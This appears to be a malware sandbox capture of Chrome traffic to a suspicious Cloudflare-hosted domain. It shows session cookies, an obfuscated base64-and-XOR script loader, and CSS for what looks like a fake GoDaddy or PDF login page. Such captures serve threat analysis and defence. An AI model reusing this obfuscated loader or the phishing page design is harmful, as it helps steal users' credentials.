                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 09:41:04 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                              2024-07-03 07:41:04 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 5a 43 51 6a 5a 6b 63 56 67 7a 65 6b 4e 30 62 33 45 32 63 33 42 74 4c 33 46 61 51 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 55 74 61 55 46 52 79 62 58 4a 74 4c 33 52 30 55 6d 73 35 61 31 56 31 59 33 70 71 5a 6b 64 77 65 55 78 61 59 6b 34 79 59 6a 46 4b 56 30 6c 73 4d 6d 63 72 55 32 5a 6d 56 47 52 4d 62 6c 6b 33 54 58 4a 71 4d 6d 5a 42 65 48 70 4f 54 58 68 42 65 6b 74 69 53 6e 59 35 62 47 64 35 4d 46 42 61 62 30 64 6a 5a 47 77 30 64 31 51 31 61 31 4e 79 5a 58 41 79 53 6b 51 32 4d 58 52 69 53 30 46 4f 52 48 68 50 56 6c 56 61 51 53 39 56 52 6a 56 6b 52 32 78 73 61 53 39 6d 54 55 74 6d 62 6d 67 34 55 33 56 72 4e 6a 56 4a 61 30 38
                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08
                                                              2024-07-03 07:41:04 UTC1369INData Raw: 31 38 64 31 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 4d 50 73 4a 55 72 6b 58 46 66 28 55 51 6f 48 6e 41 56 79 55 4b 2c 20 6e 41 42 4b 64 4f 62 76 62 6d 29 20 7b 0d 0a 6c 65 74 20 4e 65 6c 5a 75 54 53 55 67 6a 20 3d 20 27 27 3b 0d 0a 55 51 6f 48 6e 41 56 79 55 4b 20 3d 20 61 74 6f 62 28 55 51 6f 48 6e 41 56 79 55 4b 29 3b 0d 0a 6c 65 74 20 68 74 53 64 72 6b 62 57 75 79 20 3d 20 6e 41 42 4b 64 4f 62 76 62 6d 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 55 51 6f 48 6e 41 56 79 55 4b 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 4e 65 6c 5a 75 54 53 55 67 6a 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 55 51 6f 48 6e 41 56 79 55 4b 2e 63 68 61 72 43
                                                              Data Ascii: 18d1<script>function MPsJUrkXFf(UQoHnAVyUK, nABKdObvbm) {let NelZuTSUgj = '';UQoHnAVyUK = atob(UQoHnAVyUK);let htSdrkbWuy = nABKdObvbm.length;for (let i = 0; i < UQoHnAVyUK.length; i++) { NelZuTSUgj += String.fromCharCode(UQoHnAVyUK.charC
                                                              2024-07-03 07:41:04 UTC1369INData Raw: 70 4a 45 31 30 44 41 34 6f 50 57 77 57 4e 69 63 57 64 45 6f 43 4e 43 59 77 45 6a 59 7a 47 54 45 44 44 33 74 72 49 67 38 32 4c 77 6b 37 42 52 51 31 61 33 31 73 55 32 46 51 64 6b 70 64 4b 69 41 74 43 6e 6b 7a 46 54 70 58 51 7a 59 37 4a 67 30 32 49 42 52 30 53 67 6b 30 4c 43 56 63 65 33 5a 49 4f 6c 49 76 4b 78 73 56 47 52 4e 31 52 54 41 41 46 41 77 62 4d 42 56 76 63 56 4a 32 43 78 4a 37 61 79 55 4f 4e 7a 56 53 64 68 34 59 4e 69 78 2b 51 7a 38 75 48 69 4a 46 46 69 6b 76 4a 56 4e 37 59 52 4d 6b 42 52 49 31 4a 6a 45 49 50 69 67 65 61 30 67 41 4b 43 59 74 47 44 51 75 42 53 56 49 58 30 74 44 59 30 46 35 59 55 77 36 41 77 38 74 61 54 45 45 4e 58 78 53 4a 68 67 45 4b 69 59 69 42 58 74 68 47 43 51 50 42 33 74 72 64 31 51 4e 4d 52 77 52 4b 53 38 43 45 51 41 52 4c 52
                                                              Data Ascii: pJE10DA4oPWwWNicWdEoCNCYwEjYzGTEDD3trIg82Lwk7BRQ1a31sU2FQdkpdKiAtCnkzFTpXQzY7Jg02IBR0Sgk0LCVce3ZIOlIvKxsVGRN1RTAAFAwbMBVvcVJ2CxJ7ayUONzVSdh4YNix+Qz8uHiJFFikvJVN7YRMkBRI1JjEIPigea0gAKCYtGDQuBSVIX0tDY0F5YUw6Aw8taTEENXxSJhgEKiYiBXthGCQPB3trd1QNMRwRKS8CEQARLR
                                                              2024-07-03 07:41:04 UTC1369INData Raw: 4a 7a 63 45 4b 33 70 39 58 45 70 42 5a 6d 6c 6a 51 58 6c 68 55 48 5a 4b 51 53 51 6f 49 41 6f 2b 4d 78 38 6a 42 41 56 72 4f 69 6f 62 50 48 74 51 4e 51 55 58 49 7a 74 76 41 6a 59 33 46 53 52 52 62 45 78 70 59 30 46 35 59 56 42 32 53 6b 46 6d 61 57 4d 43 4e 69 30 66 4a 46 42 42 5a 58 67 68 55 44 74 77 45 6d 31 6e 61 32 5a 70 59 30 46 35 59 56 42 32 46 32 78 4d 61 57 4e 42 65 55 78 36 64 6b 70 42 5a 6d 6c 6a 51 58 6c 76 45 69 49 45 51 54 31 45 53 55 46 35 59 56 42 32 53 6b 46 6d 61 57 4e 42 65 53 77 52 4a 41 30 49 4b 48 4e 6a 55 58 6c 78 55 47 5a 4b 41 44 4d 39 4c 46 70 55 53 31 42 32 53 6b 46 6d 61 57 4e 42 65 57 46 51 64 67 34 49 4e 54 6b 76 41 43 42 37 55 44 51 47 44 69 55 69 65 47 78 54 59 56 42 32 53 6b 46 6d 61 57 4e 42 65 57 46 51 4e 41 73 43 4c 53 34
                                                              Data Ascii: JzcEK3p9XEpBZmljQXlhUHZKQSQoIAo+Mx8jBAVrOiobPHtQNQUXIztvAjY3FSRRbExpY0F5YVB2SkFmaWMCNi0fJFBBZXghUDtwEm1na2ZpY0F5YVB2F2xMaWNBeUx6dkpBZmljQXlvEiIEQT1ESUF5YVB2SkFmaWNBeSwRJA0IKHNjUXlxUGZKADM9LFpUS1B2SkFmaWNBeWFQdg4INTkvACB7UDQGDiUieGxTYVB2SkFmaWNBeWFQNAsCLS4
                                                              2024-07-03 07:41:04 UTC1369INData Raw: 52 38 50 49 6d 51 78 42 43 6b 6b 45 53 4a 51 51 53 67 6d 62 68 4d 38 4d 52 55 33 48 6c 70 4c 51 32 4e 42 65 57 46 51 64 6b 70 42 5a 6d 6c 6a 51 54 73 67 45 7a 30 4e 45 79 6b 38 4c 51 56 30 4d 68 6b 73 44 31 74 6d 4b 69 77 50 4c 53 41 5a 4f 46 46 73 54 47 6c 6a 51 58 6c 68 55 48 5a 4b 48 45 74 44 59 30 46 35 59 55 78 35 47 52 55 2f 4a 53 5a 66 56 45 74 51 64 6b 70 42 65 6a 6f 67 45 7a 41 78 42 47 68 6e 61 32 5a 70 59 30 45 71 4a 41 51 66 42 42 55 6a 4f 7a 55 41 4e 57 6c 59 66 30 70 63 65 47 6b 34 62 46 4e 68 55 48 5a 4b 41 69 6b 6e 4d 42 56 35 4e 55 42 32 56 30 45 43 4b 44 63 45 64 79 38 66 49 55 4a 49 66 55 52 4a 51 58 6c 68 55 44 4d 63 41 43 70 68 5a 41 55 38 49 77 55 78 44 51 51 30 62 6d 70 61 56 45 74 51 64 6b 70 42 4a 53 59 74 45 69 31 68 42 47 64 4b
                                                              Data Ascii: R8PImQxBCkkESJQQSgmbhM8MRU3HlpLQ2NBeWFQdkpBZmljQTsgEz0NEyk8LQV0MhksD1tmKiwPLSAZOFFsTGljQXlhUHZKHEtDY0F5YUx5GRU/JSZfVEtQdkpBejogEzAxBGhna2ZpY0EqJAQfBBUjOzUANWlYf0pceGk4bFNhUHZKAiknMBV5NUB2V0ECKDcEdy8fIUJIfURJQXlhUDMcACphZAU8IwUxDQQ0bmpaVEtQdkpBJSYtEi1hBGdK
                                                              2024-07-03 07:41:04 UTC885INData Raw: 52 2f 65 6e 5a 4b 51 57 5a 70 59 30 46 35 59 56 42 32 53 6b 46 6d 61 57 4e 64 50 53 67 47 64 67 6b 4e 4a 7a 6f 77 58 48 73 6c 48 79 4a 48 42 79 6f 6d 49 68 55 77 4c 78 64 30 56 46 31 70 4c 53 6f 58 5a 30 78 36 64 6b 70 42 5a 6d 6c 6a 51 58 6c 68 55 48 5a 4b 51 57 5a 70 59 31 30 39 4b 41 5a 32 43 51 30 6e 4f 6a 42 63 65 79 55 66 49 6b 63 48 4b 69 59 69 46 54 41 76 46 33 52 55 58 57 6b 74 4b 68 64 6e 54 48 70 32 53 6b 46 6d 61 57 4e 42 65 57 46 51 64 6b 70 64 61 53 30 71 46 32 64 4d 65 6e 5a 4b 51 57 5a 70 59 30 46 35 59 56 42 32 53 6c 30 69 49 44 56 42 4f 69 30 52 4a 52 6c 63 5a 44 6f 6d 41 69 30 6f 48 7a 67 4a 44 69 67 39 4a 67 38 74 59 30 35 62 59 45 46 6d 61 57 4e 42 65 57 46 51 64 6b 70 42 5a 6e 55 6e 43 43 39 68 45 7a 6f 4c 45 6a 56 30 59 51 63 77 4d
                                                              Data Ascii: R/enZKQWZpY0F5YVB2SkFmaWNdPSgGdgkNJzowXHslHyJHByomIhUwLxd0VF1pLSoXZ0x6dkpBZmljQXlhUHZKQWZpY109KAZ2CQ0nOjBceyUfIkcHKiYiFTAvF3RUXWktKhdnTHp2SkFmaWNBeWFQdkpdaS0qF2dMenZKQWZpY0F5YVB2Sl0iIDVBOi0RJRlcZDomAi0oHzgJDig9Jg8tY05bYEFmaWNBeWFQdkpBZnUnCC9hEzoLEjV0YQcwM
                                                              2024-07-03 07:41:04 UTC1369INData Raw: 32 62 65 61 0d 0a 48 59 65 44 6d 59 6d 4e 68 4e 35 4d 78 55 33 42 67 67 38 4b 44 63 49 4e 69 39 51 4f 51 78 42 4d 69 59 75 44 69 73 7a 48 79 46 4b 46 69 38 6c 4c 30 45 37 4a 46 41 35 48 78 4e 6d 4c 53 77 55 4f 7a 55 44 64 67 55 48 5a 6a 30 73 42 54 67 34 58 6d 70 46 42 53 38 2f 66 55 46 30 62 45 35 63 53 6b 46 6d 61 57 4e 42 65 57 46 51 64 6b 70 42 65 6d 59 6e 43 43 39 2f 66 56 78 4b 51 57 5a 70 59 30 46 35 59 55 78 35 44 67 67 77 64 30 35 72 65 57 46 51 64 6c 5a 4f 4e 53 77 67 46 54 41 75 48 6d 68 6e 61 30 74 44 59 30 46 35 59 55 77 6c 44 77 49 79 49 43 77 50 65 53 67 55 61 30 67 53 49 79 6f 33 43 44 59 76 4c 79 4d 45 41 43 73 73 59 55 45 36 4c 52 45 6c 47 56 78 6b 4c 57 34 50 4e 69 38 56 64 46 52 73 54 47 6c 6a 51 58 6c 68 55 48 5a 4b 58 53 49 67 4e 55
                                                              Data Ascii: 2beaHYeDmYmNhN5MxU3Bgg8KDcINi9QOQxBMiYuDiszHyFKFi8lL0E7JFA5HxNmLSwUOzUDdgUHZj0sBTg4XmpFBS8/fUF0bE5cSkFmaWNBeWFQdkpBemYnCC9/fVxKQWZpY0F5YUx5Dggwd05reWFQdlZONSwgFTAuHmhna0tDY0F5YUwlDwIyICwPeSgUa0gSIyo3CDYvLyMEACssYUE6LRElGVxkLW4PNi8VdFRsTGljQXlhUHZKXSIgNU
                                                              2024-07-03 07:41:04 UTC1369INData Raw: 44 79 6b 6e 4a 6b 4e 6e 54 48 70 32 53 6b 46 6d 61 57 4e 42 65 57 46 51 64 6b 70 42 5a 6d 6c 6a 58 54 41 73 46 33 59 5a 45 79 56 30 59 52 51 76 4b 53 45 36 44 41 34 4c 4b 77 6c 56 41 51 73 69 45 42 34 55 64 44 67 78 44 77 4d 74 41 43 4a 54 4e 54 51 65 47 78 51 34 44 44 34 69 4f 77 38 67 42 6e 4a 54 61 48 4a 41 64 45 56 66 53 30 4e 6a 51 58 6c 68 55 48 5a 4b 51 57 5a 70 59 30 46 6c 62 68 49 6a 48 68 55 70 4a 33 31 73 55 32 46 51 64 6b 70 42 5a 6d 6c 6a 51 58 6c 68 55 47 6f 43 55 32 59 71 4c 77 41 71 4d 6b 31 30 48 67 67 79 4a 53 5a 42 4e 43 4e 64 5a 31 78 42 4b 7a 31 75 55 47 39 6a 54 67 55 44 42 69 68 70 4b 67 39 6c 62 68 68 6b 56 47 78 4d 64 57 4a 4d 64 47 46 4d 4d 67 4d 58 65 42 6f 32 41 6a 6f 6b 41 79 56 4b 43 44 56 70 4c 51 34 74 59 51 51 2b 44 30 45
                                                              Data Ascii: DyknJkNnTHp2SkFmaWNBeWFQdkpBZmljXTAsF3YZEyV0YRQvKSE6DA4LKwlVAQsiEB4UdDgxDwMtACJTNTQeGxQ4DD4iOw8gBnJTaHJAdEVfS0NjQXlhUHZKQWZpY0FlbhIjHhUpJ31sU2FQdkpBZmljQXlhUGoCU2YqLwAqMk10HggyJSZBNCNdZ1xBKz1uUG9jTgUDBihpKg9lbhhkVGxMdWJMdGFMMgMXeBo2AjokAyVKCDVpLQ4tYQQ+D0E
                                                              2024-07-03 07:41:04 UTC1369INData Raw: 68 55 6c 47 55 39 6d 41 43 56 42 49 43 34 46 64 67 59 4f 4d 43 78 6a 46 6a 45 67 42 48 59 54 44 6a 4e 70 49 68 4d 38 59 52 51 35 41 77 38 68 5a 57 4d 59 4e 6a 52 51 49 51 4d 4e 4b 6d 6b 68 42 48 6b 79 42 54 55 4a 42 44 55 36 4a 52 51 31 62 31 42 37 52 31 39 4d 61 57 4e 42 65 57 46 51 64 6b 70 42 5a 6d 6c 6a 58 58 68 73 58 58 5a 57 45 57 59 71 4c 77 41 71 4d 6b 31 30 42 77 4e 72 65 48 56 42 50 7a 4a 64 5a 31 6c 44 65 41 63 73 51 54 67 69 45 7a 6b 66 44 7a 4a 32 59 31 30 34 59 52 67 6b 44 77 64 37 61 32 46 42 4f 69 30 52 4a 52 6c 63 5a 43 55 71 44 7a 4a 6a 54 68 55 59 42 43 63 39 4a 6b 45 32 4c 78 56 33 56 6b 34 6e 64 33 39 4f 4b 58 39 51 65 30 64 66 53 30 4e 6a 51 58 6c 68 55 48 5a 4b 51 57 5a 70 59 30 46 6c 49 77 55 69 48 67 34 6f 61 53 41 4e 4f 44 49 44
                                                              Data Ascii: hUlGU9mACVBIC4FdgYOMCxjFjEgBHYTDjNpIhM8YRQ5Aw8hZWMYNjRQIQMNKmkhBHkyBTUJBDU6JRQ1b1B7R19MaWNBeWFQdkpBZmljXXhsXXZWEWYqLwAqMk10BwNreHVBPzJdZ1lDeAcsQTgiEzkfDzJ2Y104YRgkDwd7a2FBOi0RJRlcZCUqDzJjThUYBCc9JkE2LxV3Vk4nd39OKX9Qe0dfS0NjQXlhUHZKQWZpY0FlIwUiHg4oaSANODID
                                                              2024-07-03 07:41:04 UTC1369INData Raw: 31 42 4c 69 6b 52 49 6b 6f 59 4b 54 78 6a 43 54 67 33 46 58 70 4b 41 7a 4d 39 59 78 59 78 4c 6c 41 76 42 52 52 6d 4b 44 45 45 64 33 31 66 4d 67 4d 58 65 47 6c 75 54 47 64 4c 55 48 5a 4b 51 57 5a 70 59 30 46 35 59 56 42 32 53 6b 46 6d 61 58 38 46 4d 44 64 51 4e 51 59 41 4e 54 70 2b 51 7a 30 75 42 48 73 4d 44 53 6b 6f 4e 77 67 33 4a 6c 4a 6f 56 6b 34 69 49 44 56 66 56 45 74 51 64 6b 70 42 5a 6d 6c 6a 51 58 6c 68 55 48 5a 4b 51 57 5a 70 66 77 55 77 4e 31 41 31 42 67 41 31 4f 6e 35 44 50 53 34 45 65 77 77 4e 4b 53 67 33 43 44 63 6d 55 6d 68 57 54 69 49 67 4e 56 39 55 53 30 78 33 52 30 78 6d 45 43 77 55 65 53 6f 65 4f 52 31 42 50 79 59 32 51 54 67 7a 46 58 59 46 44 32 59 39 4b 77 52 35 4d 78 38 33 44 6b 45 79 4a 6d 4d 53 4c 43 49 54 4d 78 6b 53 5a 69 41 6c 51
                                                              Data Ascii: 1BLikRIkoYKTxjCTg3FXpKAzM9YxYxLlAvBRRmKDEEd31fMgMXeGluTGdLUHZKQWZpY0F5YVB2SkFmaX8FMDdQNQYANTp+Qz0uBHsMDSkoNwg3JlJoVk4iIDVfVEtQdkpBZmljQXlhUHZKQWZpfwUwN1A1BgA1On5DPS4EewwNKSg3CDcmUmhWTiIgNV9US0x3R0xmECwUeSoeOR1BPyY2QTgzFXYFD2Y9KwR5Mx83DkEyJmMSLCITMxkSZiAlQ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              38192.168.2.662919188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:05 UTC1371OUTGET /12TvEGAMcd3aPS6720 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: text/css,*/*;q=0.1
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: style
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:05 UTC632INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:05 GMT
                                                              Content-Type: text/css;charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Disposition: inline; filename="12TvEGAMcd3aPS6720"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QqO3BtndPL0M5rW7zS2rfRee1rhQ6qKVgLIrdLrZTNZEEyCbE1SqJpEBhDiSIND%2FrTc%2BghPgTC7GO3z%2FVXKINthFTNPCI%2B5hfzRS70ngRRCQsy5kL41uildITcd2VA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b2cea43c484-EWR
                                                              2024-07-03 07:41:05 UTC737INData Raw: 33 37 62 38 0d 0a 2a 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 61 6c 65 72 74 2c 2e 72 61 64 69 6f 20 6c 61 62 65 6c 2c 2e 72 6f 77 2e 74 69 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 23 73 65 63 74 69 6f 6e 73 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 2c 2e 74 61 62 6c 65 20 2e 74 61 62 6c 65 2d 63 65 6c 6c 2c 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 68 65 61 64 65 72 20 23 70 61 67 65 4e 61 6d 65 2c 2e 72 6f 77 2e 74 69 6c 65 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 61 63 74 69 76 65 2c 2e
                                                              Data Ascii: 37b8*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f 6c 69 61 6e 20 42 61 69 74 69 22 2c 22 4d 56 20 42 6f 6c 69 22 2c 22 4d 79 61 6e 6d 61 72 20 54 65 78 74 22 2c 22 43 61 6d 62 72 69 61 20 4d 61 74 68 22 7d 2e 77 65 62 73 69 74 65 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 61 7b 63 6f 6c 6f 72 3a
                                                              Data Ascii: rosoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 3a 23 30 30 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 34 30 70 78 20 34 30 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 31 2e 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 20 6c 64 73 2d 73 70 69 6e 6e 65 72 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 31 2e 31 73 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f
                                                              Data Ascii: kground:#000}#sections_pdf .lds-spinner div{transform-origin:40px 40px;animation:1.2s linear infinite lds-spinner}#sections_pdf .lds-spinner div:first-child{transform:rotate(0);animation-delay:-1.1s}#sections_pdf .lds-spinner div:nth-child(2){transform:ro
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 28 30 2c 30 2c 30 2c 2e 31 39 32 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 61 64 65 72 62 69 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 25 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 61 6c 6c 42 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75
                                                              Data Ascii: (0,0,0,.192)}#sections_pdf .loaderbig{position:absolute;width:100px;height:100px;margin-top:15%}#sections_pdf .allBlock{position:relative;margin-top:30px;margin-left:auto;margin-right:auto;width:100%;display:flex;justify-content:center;flex-direction:colu
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 31 32 35 70 63 20 35 70 78 20 30 20 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 6c 6f 67 69 6e 62 6f 78 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 30 20 33 2e 37 35 70 74 20 2e 30 35 32 30 38 33 33 33 33 69 6e 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6f 70 74 73 3a 68 6f 76 65 72 2c 2e 62 61 63 6b 3a 68 6f 76 65 72 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e
                                                              Data Ascii: enter;justify-items:center;display:flex;border-radius:.3125pc 5px 0 0}#sections_pdf .login .loginbox{border-radius:0 0 3.75pt .052083333in}#sections .opts:hover,.back:hover,.row.tile:not(.no-pick):hover{background-color:rgba(0,0,0,.1)}#sections_pdf .login
